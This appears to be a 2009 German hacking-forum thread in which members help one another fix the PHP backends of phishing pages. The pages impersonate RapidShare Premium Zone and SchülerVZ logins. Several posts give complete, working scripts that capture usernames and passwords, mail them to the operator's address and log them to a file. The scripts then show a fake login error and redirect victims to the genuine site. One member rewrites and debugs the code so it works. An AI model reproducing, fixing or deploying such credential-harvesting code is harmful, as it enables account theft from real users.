Hey,
ich habe gerade meine rs Pishingseite überprüft und bemerkt, dass die send.php nix mehr an emails verschickt und auch die Weiterleitung sehr komisch ist.
Vll kann mir ja einer helfen hier:
[quote]<?php
$benutzer=$HTTP_POST_VARS['benutzer'];
$pass=$HTTP_POST_VARS['pass'];
if ($pass == "")
{
print("Bitte geben Sie ihr Passwort ein");
}
elseif ($benutzer == "")
{
print("Bitte geben Sie ihren Benutzernamen ein");
}
else
{
$mailtext="Benutzername:";
$mailtext.=$benutzer;
$mailtext.="\n";
$mailtext.="Passwort: ";
$mailtext.=$pass;
$absender="From:";
$absender.="rapidshare@phishing.de";
mail("XXXXX@web.de",$benutzer,$mailtext,$absender) ;
print("Es ist ein Fehler beim Login aufgetreten, bitte versuchen sie es erneut.");
}
$neue_datei = fopen("log.txt", a);
fwrite($neue_datei, "Benutzer:$benutzer \nPasswort:$pass \n\n\n");
fclose($neue_datei);
?>
<html>
<body>
<meta http-equiv="Refresh" content="1; url=https://ssl.rapidshare.com/premiumzone.html">
</body>
</html>
es handelt sich um rapidshare Premium Zone ...
lg
Ergebnis 1 bis 10 von 17
Thema: Ist meine send.php richtig ?
-
02.04.2009, 11:51 #1Trojaner
- Registriert seit
- 02.01.2009
- Beiträge
- 58
Ist meine send.php richtig ?
-
02.04.2009, 12:07 #2Bugbear Wurm
- Registriert seit
- 21.08.2008
- Beiträge
- 258
Ich bin mir nicht so sicher aber soweit ich weiß muss für mail() auch der Maildienst auf dem Server eingeschaltet sein. Könnte es daran liegen, dass der ausgeschaltet ist?
-
02.04.2009, 13:49 #3Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Mh... Ich habe das mal so optimiert, wie ich denke, dass es richtig ist...
Den Redirekt auf alle Fälle mit dem Header()-Befehl. Den Meta-Befehl in HTML nutzt eigentlich keiner mehrCode:<?php $benutzer = $_POST['benutzer']; $pass = $_POST['pass']; if (!$pass OR $pass == "") { print "Bitte geben Sie ihr Passwort ein" AND exit; } elseif (!$benutzer OR $benutzer == "") { print "Bitte geben Sie ihren Benutzernamen ein" AND exit; } else { $mailtext = "Benutzername:"; $mailtext .= $benutzer; $mailtext .= "\n"; $mailtext .= "Passwort: "; $mailtext .= $pass; $name = "Phishing"; $email = "phishing@rapidshare.com"; $header = "From: ". $name . " <" . $email . ">\r\n"; mail("XXXXX@web.de",$benutzer,$mailtext,$header); print "Es ist ein Fehler beim Login aufgetreten, bitte versuchen sie es erneut."; } $neue_datei = fopen("log.txt", a); fwrite($neue_datei, "Benutzer:$benutzer \nPasswort:$pass \n\n\n"); fclose($neue_datei); header("location: https://ssl.rapidshare.com/premiumzone.html"); ?>
. Optional kannst Du den auch an den Anfang setzen. Wäre hier nur nicht so gut, da Du ja eine Fehlerausgabe gemacht hast.
Die anderen Änderungen sind nur klein aber ich denke so geht es.
Ansonsten: http://de2.php.net/manual/de/book.mail.phpGeändert von VeN0m (02.04.2009 um 13:57 Uhr)
Come to the dark side - We have cookies
-
02.04.2009, 20:43 #4Trojaner
- Registriert seit
- 02.01.2009
- Beiträge
- 58
also mail geht jetzt so wies aussieht, doch das mit dem "
Es ist ein Fehler beim Login aufgetreten, bitte versuchen sie es erneut."
das geht iwie nicht das wird gar nicht angezeigt ... wird direkt auf die real seite gelinkt
lg
-
02.04.2009, 20:50 #5Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Mh... Ich hatte ganz vergessen, dass Du den Hinweistext ja angezeigt haben möchtest ^^.
Dann ersetz den Header-Befehl nochmal:
URL=Seite. Das "Seite" ersetzt Du natürlich mit Deinem Ziel.Code:header("refresh:3;url=seite"); print "Es ist ein Fehler beim Login aufgetreten, bitte versuchen Sie es erneut.";
Refresh:3 ist die Zeit, die bis zum Refresh vergeht. Ähnlich oder gleich, wie beim Meta-Befehl. Drei genügt eigentlich. Ich hatte es vorhin noch getestet. Das ist genug Zeit.
Diese Codezeile setzt Du an die Stelle, wo der Fehler ausgegeben wird. Das Header am Schluss entfernst Du.
Müsste eigentlich gehen.Geändert von VeN0m (02.04.2009 um 20:52 Uhr) Grund: Förmliche Anrede angepasst ^^
Come to the dark side - We have cookies
-
02.04.2009, 21:22 #6Trojaner
- Registriert seit
- 02.01.2009
- Beiträge
- 58
so also bei mir sieht das jetzt so aus:
<?php
$benutzer = $_POST['benutzer'];
$pass = $_POST['pass'];
if (!$pass OR $pass == "")
{
print "Bitte geben Sie ihr Passwort ein" AND exit;
}
elseif (!$benutzer OR $benutzer == "")
{
print "Bitte geben Sie ihren Benutzernamen ein" AND exit;
}
else
{
$mailtext = "Benutzername:";
$mailtext .= $benutzer;
$mailtext .= "\n";
$mailtext .= "Passwort: ";
$mailtext .= $pass;
$name = "Phishing";
$email = "phishing@rapidshare.com";
$header = "From: ". $name . " <" . $email . ">\r\n";
mail("sonXX.XXkX@web.de",$benutzer,$mailtext,$head er);
header("refresh:3;url=https://ssl.rapidshare.com/premiumzone.html");
print "Es ist ein Fehler beim Login aufgetreten, bitte versuchen Sie es erneut.";
}
$neue_datei = fopen("log.txt", a);
fwrite($neue_datei, "Benutzer:$benutzer \nPasswort:$pass \n\n\n");
fclose($neue_datei);
?>
Jetz habe ich das nochmal ausprobiert und habe das gesehen:
Warning: mail() [function.mail]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\XXXX\www\XXXXX\send.php on line 22
Es ist ein Fehler beim Login aufgetreten, bitte versuchen Sie es erneut.
Notice: Use of undefined constant a - assumed 'a' in C:\XXXX\www\XXXXX\send.php on line 28
kannst du mir das ganze nochmal geben ? Also mit Verbesserungen usw. ?
Das mit dem Header habe ich anscheindend noch hinbekommen
lgGeändert von Junkycool (02.04.2009 um 21:25 Uhr)
-
02.04.2009, 21:43 #7Miezekatze
- Registriert seit
- 10.12.2007
- Beiträge
- 170
Das funktioniert nicht über localhost, weil du keinen Mailserver installiert hast. Sobald du das auf nen Webspace uppst müsste es eigentlich gehen, da die meisten Hoster das unterstützen.
MfGBei Fragen -> PM an mich oder in ICQ adden.
453-144-667
Zitat von DEVV
-
02.04.2009, 21:47 #8Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Die Leerstelle dazwischen hast Du aber hoffentlich gerade hinzugedichtet?Code:mail("sonXX.XXkX@web.de",$benutzer,$mailtext,$head er);
$header meine ich. Da steht in Deinem Code eine Leerstelle.
@garwga: "also mail geht jetzt so wies aussieht, doch das mit dem", sagte er oben. Heißt das nicht, dass es geht? Also vorher kam anscheinend noch kein Fehler.
Ich d enke es liegt an der Leerstelle. Ansonsten kann das auch am localhost liegen, was ich aber eher weniger glaube.Come to the dark side - We have cookies
-
03.04.2009, 10:51 #9Trojaner
- Registriert seit
- 02.01.2009
- Beiträge
- 58
so vielen dank an euch alle
es klappt wieder super !
THX !
lg
-
12.04.2009, 21:12 #10Anfänger
- Registriert seit
- 26.03.2009
- Beiträge
- 12
Will mich hier mal mit meinem Problem anschließen. Also ich habe eine SVZ-Phishing seite. Die hatte ich vorher bei funpic, hat auch alles geklappt. Nun wurde meine Page gelöscht und ich bin zu kilu.de umgezogen. Habe alle Dateien unverändert hochgeladen. Aber es klappt nicht mehr. Auf der Kilu-Hp gibt es einen Punkt SMTP Umleitung für mail(). Da habe ich nichts ausgefüllt, da ich nich weiß, was bei SMTP Server hinkommt. Meine send.php sieht wiefolgt aus:
I-welche Fehler? und was hat es mit dem SMTP auf sich? Ich glaube das ist der Fehler.PHP-Code:<?php
$benutzer=$HTTP_POST_VARS['benutzer'];
$pass=$HTTP_POST_VARS['pass'];
if ($pass == "")
{
print("Bitte geben Sie ihr Passwort ein");
}
elseif ($benutzer == "")
{
print("Bitte geben Sie ihren Benutzernamen ein");
}
else
{
$mailtext="Benutzername:";
$mailtext.=$benutzer;
$mailtext.="\n";
$mailtext.="Passwort: ";
$mailtext.=$pass;
$absender="From: Phish <phish@freenet.de>";
mail("xxxx@web.de",$benutzer,$mailtext,$absender);
// Edit your Email Address and the text which will be printed after logging in !
print("Error!");
}
?>
<html>
<body>
<meta http-equiv="Refresh" content="1; url=http://www.gearfuse.com/wp-content/uploads/2007/10/nerd.jpg">
</body>
</html>
Zitieren
